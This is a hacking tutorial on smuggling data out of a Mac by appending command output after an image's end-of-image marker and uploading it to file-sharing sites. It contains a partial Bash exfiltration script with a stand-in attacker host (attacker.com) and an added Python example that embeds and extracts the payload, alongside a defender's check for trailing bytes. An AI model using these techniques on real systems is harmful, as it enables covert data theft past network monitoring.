Hacking macOS: How to Use Images to Smuggle Data Through Firewalls

Data can be injected into images quickly without the use of metadata tools. Attackers may use this knowledge to exfiltrate sensitive information from a MacBook by sending the pictures to ordinary file-sharing websites.


Continuing on the topics of DPI evasion, payload obfuscation, and using popular websites to bypass firewalls, we'll be looking at an alternative way of embedding data into images. Unlike using metadata tags to store payloads inside an image, this method appends the text to the very end of the image file, after the marker that closes the image data (EOI for JPEG, IEND for PNG). Image viewers stop reading at that marker, so the picture still opens normally, and the file still begins with a valid image signature, which is all a magic-bytes type check or a naive upload filter looks at.


Understanding the Attack


A simple Bash script was created for this article to demonstrate how an attacker can easily exfiltrate data inside images found on a target Mac computer. The script is below, and you can view it on my GitHub as well.


#!/bin/bash
# Script for https://null-byte.com/smuggle-data-through-firewalls-0197128/

# This is the command being executed and embedded in the photo.
# Single quotes are used here to help with escaping special
# characters within the desired command(s).
exfilData='ls -lah "/Users/$USER/"'

# Where the attacker's PHP server is located. This needs to be
# updated to use a public domain, like Dropbox or something
# with an official API.
exfilSite="http://attacker.com/index.php"

# If no suitable image is found on the target computer, this
# image will be downloaded and used instead. By default, the
# script tries to use an image already ..
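The following is an added example, not the article's script and not taken from the author's GitHub. It shows the append-after-EOI idea from the section above in Python, and goes a little beyond the article: it includes the receiver side that recovers the payload and the check a defender would run on the same file. The delimiter string, the names (fake_jpeg, embed, extract, trailing_bytes) and the stand-in JPEG bytes are this example's own assumptions; the image is constructed inline rather than taken from disk.

```python
# Added example, not the article's script. Names, the MARKER delimiter and the
# stand-in image bytes are assumptions made for this demonstration.
import base64
import subprocess
from typing import List, Optional

SOI = b"\xff\xd8"             # JPEG start-of-image marker (what type checks read)
EOI = b"\xff\xd9"             # JPEG end-of-image marker: decoders stop here
MARKER = b"\n--NB-EXFIL--\n"  # assumed delimiter so the receiver can find the payload


def fake_jpeg() -> bytes:
    """Constructed stand-in for an image found on the target: SOI, a JFIF APP0
    segment and EOI. Not decodable, but it has the bytes a type check looks at."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    return SOI + b"\xff\xe0" + (len(app0) + 2).to_bytes(2, "big") + app0 + EOI


def collect(argv: List[str]) -> bytes:
    """Run the command whose output is to be smuggled (the article uses ls -lah)."""
    return subprocess.run(argv, capture_output=True, check=False).stdout


def embed(image: bytes, payload: bytes) -> bytes:
    """Append the payload after EOI. The image bytes are untouched, so the picture
    still opens, and the file still starts with a JPEG signature."""
    if not image.startswith(SOI) or not image.endswith(EOI):
        raise ValueError("expected a JPEG that ends with EOI")
    # base64 keeps the appended bytes free of 0xFF, so no accidental EOI appears
    return image + MARKER + base64.b64encode(payload)


def extract(blob: bytes) -> Optional[bytes]:
    """Receiver side: everything after the LAST EOI is ours. Last, not first:
    EXIF thumbnails embed a complete JPEG with its own EOI inside APP1."""
    end = blob.rfind(EOI)
    if end < 0:
        return None
    trailer = blob[end + len(EOI):]
    if not trailer.startswith(MARKER):
        return None
    return base64.b64decode(trailer[len(MARKER):])


def looks_like_jpeg(blob: bytes) -> bool:
    """What a magic-bytes type check (file(1), a naive upload filter) sees."""
    return blob.startswith(SOI)


def trailing_bytes(blob: bytes) -> int:
    """Defender's check: bytes after the last EOI. A clean JPEG has none."""
    end = blob.rfind(EOI)
    return 0 if end < 0 else len(blob) - (end + len(EOI))


if __name__ == "__main__":
    stego = embed(fake_jpeg(), collect(["ls", "-lah", "/"]))
    print("passes type check:", looks_like_jpeg(stego))
    print("bytes after EOI:", trailing_bytes(stego))
    print(extract(stego).decode(errors="replace"))
```

The smuggled file passes a signature check because only its first bytes are inspected, while the payload sits in the region most inspectors never read. The same fact gives the defender a cheap test: a JPEG that opens normally yet carries bytes after its last EOI (or a PNG with bytes after IEND) deserves a second look, and `trailing_bytes` is that test. Uploading the result to a file-sharing site, as the article describes, is a separate step not shown here.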
